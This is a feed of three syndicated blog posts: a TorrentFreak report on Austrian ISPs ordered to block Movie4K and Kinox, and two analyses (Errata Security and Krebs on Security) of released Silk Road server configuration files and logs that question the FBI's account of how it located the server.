This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Kino.to, at the time one of the world’s largest illegal streaming portals, was shut down in 2011 as part of Europe’s largest ever action against piracy sites.

However, just a month before Kino.to was dismantled, Austrian ISP ‘UPC’ was served with a preliminary injunction ordering it to block subscriber access to the site. The order had been obtained by the Hollywood-affiliated anti-piracy group VAP but it was called into doubt by the ISP. This led to the Austrian Supreme Court referring the matter to the European Court of Justice.

Earlier this year the ECJ handed down its widely publicized decision which stated that yes, in reasonable circumstances, pirate sites can indeed be blocked by European ISPs.

On the back of this ruling, VAP subsequently wrote to several local ISPs (UPC, 3, Tele2 and A1) demanding blockades of Movie4K.to and Kinox.to, a site that took over from Kino.to. This would become the test case on which all future blockades would be built.

When this formal request for the ISPs to block the sites was rejected, in August VAP sued the providers. And now, after more than three years of wrangling, VAP have finally got their way.

In a ruling handed down yesterday by the Commercial Court of Vienna, UPC, 3, Tele2 and A1 were ordered to block Movie4K and Kinox with immediate effect. According to Der Standard, UPC and A1 placed blocks on the sites within hours, with 3 and Tele2 expected to comply with the injunction today.

But while another important hurdle has now been overcome, there is some way to go before VAP will have achieved everything they initially set out to do. At issue now is how far the ISPs will have to go in order to comply with the court order. It’s understood that VAP requires DNS and IP address blocking at a minimum, but whether the ISPs intend to comply with that standard remains to be seen.

It’s important for VAP, and other anti-piracy groups waiting in the wings, that these technical steps are workable going forward. Both VAP and the IFPI have lists of sites they would like blocked in the same way as Movie4K and Kinox have been, so it’s crucial to them that blockades aren’t easily circumvented.

Once this issue has been dealt with, in the next few months it’s likely that attention will turn to legal action being planned by the IFPI. The recording group has taken on the task of having torrent sites blocked in Austria, starting off with The Pirate Bay, isoHunt.to, 1337x.to and H33t.to.

IFPI is expected to sue several ISPs in the hope that local courts will treat torrent sites in the same way as they have streaming services. Once that’s been achieved – and at this stage it seems likely – expect long lists of additional domains to be submitted to the courts.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using “parallel construction”, meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration“). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, his saved none of the forensics data. You’d have thought that had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger. I document this sort of thing all the time. It’s not hard for me, it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two serves involved.

The actual Tor “onion” server ran on a server in Germany at the IP address 65.75.246.20. This was the front-end server.

The Silk Road data was held on a back-end server in Iceland at the IP address 193.107.86.49. This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) configuration is shown below. Because this requires “basic authentication”, Tarbell could not have accessed the server on this port.

However, the thing to note about this configuration is that “basic” authentication was used over port 80. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, what the “Wall of Sheep” at DefCon is all about.

The following picture shows the configuration of the HTTPS site.

Notice firstly that the “listen 443″ specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even if it cannot get anything but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong, the web server accept all TCP connections, though it may give a “403 forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.

Next is the location information that allows only localhost, the German server, and then denies everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but does produce a “403 forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server has the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course, there is no log of him having accessed the server this way,, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpage.

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following:

62.75.246.20 – – [14/Jul/2013:06:55:33 +0000] “GET /orders/cart HTTP/1.0″ 200 49072 “http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7″ “Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0″

Since the defense could not find in the logfiles where Tarbell had access the system, the prosecutors helped them out by pointing to entries that looked like the following:

199.170.71.133 – – [11/Jun/2013:16:58:36 +0000] “GET / HTTP/1.1″ 200 2616 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

199.170.71.133 – – [11/Jun/2013:16:58:36 +0000] “GET
/phpmyadmin.css.phpserver=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1″ 200 41724 “http://193.107.86.49/” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36″

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return “200 ok” as the error code instead of a “401 unauthorized” login error as one would expect from the configuration. This means either the FBI knew the password, or the configuration has changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.

Conclusion

As an expert in such topics as sniffing passwords and masscaning the Internet, I know that tracking down the Silk Road site is well within the NSA’s capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that it doesn’t match the Tarbell declaration. That’s not to say that the Tarbell declaration has been disproven, it’s just that “parallel construction” is a better explanation for what’s going on than Tarbell actually having found the Silk Road server on his own.

Krebs on Security: Silk Road Lawyers Poke Holes in FBI’s Story

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.

The login prompt and CAPTCHA from the Silk Road home page.

Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users’ anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server’s true Internet address to the site’s users, and this was the very technology that the Silk road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.

For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government’s claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver,a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

“The IP address listed in that file — 62.75.246.20 — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that’s a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

“I find it surprising that when given the chance to provide a cogent, on-the record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality,” Weaver said. “”Let me tell you, those tin foil hats are looking more and more fashionable each day.”